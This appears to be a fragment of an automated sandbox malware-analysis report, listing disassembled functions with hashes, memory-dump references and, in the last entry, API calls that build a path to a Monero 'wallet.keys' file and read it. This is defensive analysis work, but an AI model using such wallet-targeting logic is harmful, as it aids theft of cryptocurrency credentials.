                                      • Instruction ID: 9355ba3a13e7c67925e6d1e226fea5ac1e10081b1be9fa13ad6eb45376eb8f4f
                                      • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                      • Instruction Fuzzy Hash: FC91D571A002118FDF16EE68DC80BBAB3A5AF55300F694565ED18AB382D372DF05CFA1
                                      Function 001996FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction ID: 8463c7a1652af0ae9f365fbfc80706bec896da0b62969c346b69c2fc33702e58
                                      • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction Fuzzy Hash: F1B11B316106099FDB19CF2CC48AB657BE1FF45368F29865CE899CF2A2C735E991CB40
                                      Function 0016B198 Relevance: .3, Instructions: 268COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction ID: dffa3804479977a2339f48adfe8dca6a9b2ef74b4a9abd78ee1762ba0b6f14a8
                                      • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction Fuzzy Hash: 75C14A75A0471A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E9A6CF81
                                      Function 0017D5A8 Relevance: .3, Instructions: 258COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction ID: 4edda262da39831b1644ea09ceb900c1432388b6ce0be0acfe7d58e44ca5a46b
                                      • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction Fuzzy Hash: A69157319287946AEB168B38DC427BAB7B4FFE6350F14C31AF98C72491FB7185818345
                                      Function 0018D39E Relevance: .2, Instructions: 242COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction ID: ea9028abda254a808afcc2cb0bf5f50786ed2b64f94516164929dfc17713df4a
                                      • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction Fuzzy Hash: D3A12E72A10B19CBEB19CF55DCC1A9ABBB1FB54314F24C62AD41AE76A0D334AA44CF50
                                      Function 00154288 Relevance: .2, Instructions: 240COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction ID: eb82a986780ddfdc2f6353ff718850e137df4ede2e6968527cb8fe4182400b0e
                                      • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction Fuzzy Hash: 1DA17072E083119BD308CF25C89075BF7E2EFC8714F1AC93DA8A99B254D774E8449B82
                                      Function 00561D1F Relevance: .1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07cb1c1adb8716050454af550095c5405281e5ea346c0dbec99f7d0889cd503a
                                      • Instruction ID: e23c1fe6126b96dafc17667b0b5d85560cf7ddaf06ad89cd8721f366be3a5ad7
                                      • Opcode Fuzzy Hash: 07cb1c1adb8716050454af550095c5405281e5ea346c0dbec99f7d0889cd503a
                                      • Instruction Fuzzy Hash: D54106F36186095FE300EE3EDD4476AB7DBEBC0711F2AC93D9A84C3B48E93985064656
                                      Function 0068D75D Relevance: .1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 998db67b5cf3e8c0ce796af800ec687be72b8c99d3b03424e71d4901ef10ae68
                                      • Instruction ID: 2b898fa75a73a42cca04e3c131f175f894754c6843bb2c8d0b068c4587fbd0e3
                                      • Opcode Fuzzy Hash: 998db67b5cf3e8c0ce796af800ec687be72b8c99d3b03424e71d4901ef10ae68
                                      • Instruction Fuzzy Hash: E541BEB220C700DFD3057E29D88573AB7E6EF94310F264A2ED6C687684D63558429BA7
                                      Function 00186799 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: d7c46782092b2a627e13d44fc11cb95ed778ed55641aa2ecf7bfaee58cff35c0
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction Fuzzy Hash: 83512962E09BD589C7058B7544502EEBFB21FE6214F1E829EC4981B383C3759789D3E5
                                      Function 00604BAD Relevance: .1, Instructions: 94COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f040842663a0fef4b0a88de99f4633729b31a50248819a13156378e9c6cf4492
                                      • Instruction ID: 1cfefe6f4e10d65e56e450ce9df247348dd89aca3fde893e803e79afbab2365f
                                      • Opcode Fuzzy Hash: f040842663a0fef4b0a88de99f4633729b31a50248819a13156378e9c6cf4492
                                      • Instruction Fuzzy Hash: 6F31F2B250C700DFD305AF29D88167EFBF5EFA8710F16482DD2D582650EA305884CB57
                                      Function 00157588 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                      • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                      • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                      • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                      Function 00129AA0 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Function 001203B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
